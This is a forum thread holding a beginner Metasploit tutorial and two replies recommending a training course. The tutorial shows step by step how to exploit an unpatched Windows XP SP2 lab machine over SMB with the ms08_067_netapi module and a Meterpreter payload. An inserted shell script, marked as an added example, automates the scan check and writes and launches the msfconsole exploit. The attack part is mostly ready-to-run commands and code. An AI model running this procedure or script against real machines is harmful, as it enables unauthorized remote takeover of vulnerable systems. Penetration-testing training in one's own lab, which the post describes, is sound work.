
introduction to metasploit

This tutorial gives a basic introduction to Metasploit.
In the process, we'll also exploit a machine and run Meterpreter on it.

Everything that needs to be typed into the console uses the code tag,
for example:

Code:

msfconsole

Also, I assume you have some basic understanding of networking and Linux.

WARNING: it is illegal to access a machine in any way that you do not have permission to access, and it might land you in jail. I am not responsible for the actions you take. You have been warned.

Now on to the actual guide.

Requirements:
BackTrack 4 final
unpatched Windows XP SP2 box
(confirmed that this does not work on XP SP3)
some patience

These are my IPs; make sure to change them to reflect your own settings:
attacker: 192.168.198.129
victim: 192.168.198.130

OK, first things first, make sure that Metasploit is updated.

Code:

/pentest/exploits/fasttrack/fast-track.py -i
1
2

Do an nmap scan to make sure there are some open ports (hopefully with vulnerable services):

Code:

nmap -v 192.168.198.130

Nmap is done scanning and showed me 3 open ports (if yours says filtered on all ports, try turning off any firewall).
These are ports 135, 139 and 445.
We're going to focus on port 445.
A quick search on Google shows that port 445 is commonly used for SMB.

Start up Metasploit:

Code:

msfconsole

When it's done loading,

Code:

show exploits windows

We need an exploit for SMB, so we choose one from the smb folder. I used the ms08_067_netapi exploit.

Code:

use windows/smb/ms08_067_netapi

Notice that after we typed this, the prompt changed from msf > to msf exploit(ms08_067_netapi) >.

Great, so now we have an exploit, but what next?
An exploit is useless without a payload, so:

Code:

show payloads

This gives us a list of payloads compatible with the exploit.
We're going to use a Meterpreter payload for this tutorial:

Code:

set payload windows/meterpreter/bind_tcp

Now to configure it all:

Code:

info
set target 3
set rhost 192.168.198.130

target is which Windows version and service pack the victim runs (in our case XP SP2),
though you could also leave it as it is.
rhost is the IP of the victim.
Everything else can be left at the default.
If the payload were a reverse TCP one, we would also need to set lhost;
lhost is the attacker's IP.

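The whole procedure from the post (check the scan for an open 445, pick the module and payload, set rhost and, only for a reverse payload, lhost, then run it) as a short POSIX shell script that writes an msfconsole resource script. This is an added example, not part of the original post or of Metasploit itself. It assumes nmap's grepable output (nmap -oG -) rather than the -v output used in the post; the scan lines embedded below are constructed samples, not real scan results, and the IPs are the ones from the post.

```shell
#!/bin/sh
# Added example: automate the tutorial's steps as an msfconsole resource script.
# Assumes nmap grepable output (nmap -oG -); the scan lines below are constructed,
# not real scan results, and stand in for the scan of 192.168.198.130 in the post.

# Print the state nmap reported for PORT on HOST (open, filtered, closed, ...),
# or "none" if the port does not appear. Reads nmap -oG output on stdin.
port_state() {
    host=$1 port=$2
    state=$(grep "^Host: $host " | grep 'Ports:' | tr ',' '\n' \
        | sed -n "s#.*[[:space:]]$port/\([a-z|]*\)/tcp.*#\1#p" | head -n 1)
    printf '%s\n' "${state:-none}"
}

# Emit the msfconsole commands from the post as a resource script.
# A bind payload listens on the victim, so LHOST is only needed for reverse payloads.
build_rc() {
    payload=$1 rhost=$2 lhost=$3 target=$4
    printf 'use exploit/windows/smb/ms08_067_netapi\n'
    printf 'set PAYLOAD %s\n' "$payload"
    printf 'set RHOST %s\n' "$rhost"
    printf 'set TARGET %s\n' "$target"
    case $payload in
        *reverse*) printf 'set LHOST %s\n' "$lhost" ;;
    esac
    printf 'exploit\n'
}

# Only build the script when the scan shows 445 open; a filtered port means a
# firewall is in the way (the post's "try turning off any firewall" case).
plan_attack() {
    scan=$1 rhost=$2 lhost=$3 payload=$4 target=$5
    state=$(printf '%s\n' "$scan" | port_state "$rhost" 445)
    if [ "$state" != open ]; then
        echo "port 445 on $rhost is $state, not open; nothing to exploit" >&2
        return 1
    fi
    build_rc "$payload" "$rhost" "$lhost" "$target"
}

# Constructed nmap -oG output matching the three open ports described in the post.
SAMPLE_SCAN=$(cat <<'EOF'
# Nmap scan initiated (constructed sample)
Host: 192.168.198.130 ()  Status: Up
Host: 192.168.198.130 ()  Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///  Ignored State: closed (997)
EOF
)

# Constructed output for a firewalled host, where the exploit would just hang.
FILTERED_SCAN=$(cat <<'EOF'
Host: 192.168.198.131 ()  Status: Up
Host: 192.168.198.131 ()  Ports: 445/filtered/tcp//microsoft-ds///  Ignored State: filtered (999)
EOF
)

ATTACKER=192.168.198.129
VICTIM=192.168.198.130
PAYLOAD=${PAYLOAD:-windows/meterpreter/bind_tcp}

# Dry run by default: print the resource script. With RUN_MSF=1 the script is
# fed to msfconsole -r instead; replace SAMPLE_SCAN with a real scan first, e.g.
#   SCAN=$(nmap -p135,139,445 -oG - "$VICTIM")
if [ "${RUN_MSF:-0}" = 1 ]; then
    rc=$(mktemp)
    plan_attack "$SAMPLE_SCAN" "$VICTIM" "$ATTACKER" "$PAYLOAD" 3 > "$rc" && msfconsole -r "$rc"
    rm -f "$rc"
else
    plan_attack "$SAMPLE_SCAN" "$VICTIM" "$ATTACKER" "$PAYLOAD" 3
fi
```

Run it as-is to see the resource script the post's commands add up to; run it with PAYLOAD=windows/meterpreter/reverse_tcp to see the extra set LHOST line appear, and feed it a scan where 445 is filtered to see it refuse rather than launching an exploit that can never connect.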

Re: introduction to metasploit

Here is a lot of information on Metasploit from the folks at Offensive Security: Metasploit Unleashed - Mastering the Framework. Edit: Whoops, didn't see Linus1907 already posted it.
I did a 45 minute presentation on that metasploit unleashed page and did most of the things on that page.

Re: introduction to metasploit

Originally Posted by Mr-Protocol

Here is a lot of information on Metasploit from the folks at Offensive Security: Metasploit Unleashed - Mastering the Framework. Edit: Whoops, didn't see Linus1907 already posted it.
I did a 45 minute presentation on that metasploit unleashed page and did most of the things on that page.

Definitely worthy of mentioning. The Metasploit Unleashed course took me from maybesploit to megasploit in just 2 days.